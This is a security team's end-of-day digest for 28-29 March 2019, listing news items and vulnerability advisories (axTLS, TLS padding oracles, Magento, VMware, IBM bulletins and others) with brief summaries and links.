===================== = End-of-Day report = =====================
Timeframe: Donnerstag 28-03-2019 18:00 − Freitag 29-03-2019 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner
===================== = News = =====================
∗∗∗ Schwere Sicherheitslücke in SSL/TLS-Bibliothek axTLS ∗∗∗ --------------------------------------------- Webserver, die die Transportverschlüsselung über axTLS realisieren, sind für Angriffe empfänglich. --------------------------------------------- http://heise.de/-4355704
∗∗∗ World Backup Day: Is your data in safe hands? ∗∗∗ --------------------------------------------- World Backup Day is a reminder that organizations and individuals need to make data backup and protection a priority --------------------------------------------- https://www.welivesecurity.com/2019/03/29/world-backup-day-data-safe-hands/
∗∗∗ TLS CBC Padding Oracles in 2019 ∗∗∗ --------------------------------------------- Since August, I've spent countless hours studying CBC padding oracle attacks toward the development of a new scan tool called padcheck. Using this tool, I was able to identify thousands of popular domains which could be targeted by an active network adversary (i.e. MiTM) to hijack authenticated HTTPS sessions. The underlying vulnerabilities break down into [...] --------------------------------------------- https://www.tripwire.com/state-of-security/vert/tls-cbc-padding-oracles/
∗∗∗ Researchers discover and abuse new undocumented feature in Intel chipsets ∗∗∗ --------------------------------------------- Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology. --------------------------------------------- https://www.zdnet.com/article/researchers-discover-and-abuse-new-undocumente...
∗∗∗ Researchers publish list of MAC addresses targeted in ASUS hack ∗∗∗ --------------------------------------------- Most of the targeted MAC addresses are used by ASUStek, Intel, and AzureWave devices. --------------------------------------------- https://www.zdnet.com/article/researchers-publish-list-of-mac-addresses-targ...
===================== = Vulnerabilities = =====================
∗∗∗ Rockwell Automation PowerFlex 525 AC Drives ∗∗∗ --------------------------------------------- This advisory includes mitigations for a resource exhaustion vulnerability reported in Rockwell Automations PowerFlex 525 AC drive. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01
∗∗∗ Magento 2.3.1, 2.2.8 and 2.1.17 Security Update ∗∗∗ --------------------------------------------- Magento Commerce and Open Source 2.3.1, 2.2.8 and 2.1.17 contain multiple security enhancements that help close Remote Code Execution (RCE), Cross-Site Scripting (XSS) and other vulnerabilities. --------------------------------------------- https://magento.com/security/patches/magento-2.3.1-2.2.8-and-2.1.17-security...
∗∗∗ VMSA-2019-0004 ∗∗∗ --------------------------------------------- VMware vCloud Director for Service Providers update resolves a Remote Session Hijack vulnerability --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2019-0004.html
∗∗∗ VMSA-2019-0005 ∗∗∗ --------------------------------------------- VMware ESXi, Workstation and Fusion updates address multiple security issues. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2019-0005.html
∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (dovecot and imagemagick), Debian (dovecot, libraw, pdns, and ruby2.1), Fedora (mingw-podofo, openwsman, podofo, qemu, and svgsalamander), openSUSE (chromium, ffmpeg-4, firefox, libssh2_org, nodejs4, and qemu), Red Hat (libssh2), Scientific Linux (libssh2 and thunderbird), SUSE (kernel, liblouis, ntp, openssl-1_1, and tiff), and Ubuntu (firefox, freeimage, libapache2-mod-auth-mellon, and thunderbird). --------------------------------------------- https://lwn.net/Articles/784370/
∗∗∗ Vuln: Apache HBase CVE-2019-0212 Authorization Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.securityfocus.com/bid/107624
∗∗∗ Vuln: Apache ActiveMQ CVE-2019-0222 Denial of Service Vulnerability ∗∗∗ --------------------------------------------- http://www.securityfocus.com/bid/107622
∗∗∗ GnuTLS: Mehrere Schwachstellen ermöglichen Denial of Service ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K19-0253
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational DOORS Web Access ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabiliti...
∗∗∗ IBM Security Bulletin: IBM Event Streams is affected by cURL vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...
∗∗∗ IBM Security Bulletin: IBM Event Streams is affected by vulnerabilities in the shipped Node runtime ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...
∗∗∗ IBM Security Bulletin: IBM Event Streams is affected by jackson-databind vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...
∗∗∗ IBM Security Bulletin: Rational Build Forge Security Advisory for Apache HTTP Server (CVE-2019-0190; CVE-2018-17189; CVE-2018-17199) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-rational-build-forge-s...
∗∗∗ IBM Security Bulletin: IBM Event Streams is affected by Alpine vulnerability CVE-2018-1000849 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...
∗∗∗ IBM Security Bulletin: IBM Event Streams is affected by Node.js vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...
∗∗∗ IBM Security Bulletin: Security vulnerabilities identified in OpenSSL affect Rational Build Forge (CVE-2018-0734, CVE-2018-5407 and CVE-2019-1559) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-security-vulnerabiliti...
∗∗∗ IBM Security Bulletin: IBM Event Streams is affected by OpenSSL vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...
∗∗∗ IBM Security Bulletin: IBM Event Streams is affected by gettext vulnerability CVE-2018-18751 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...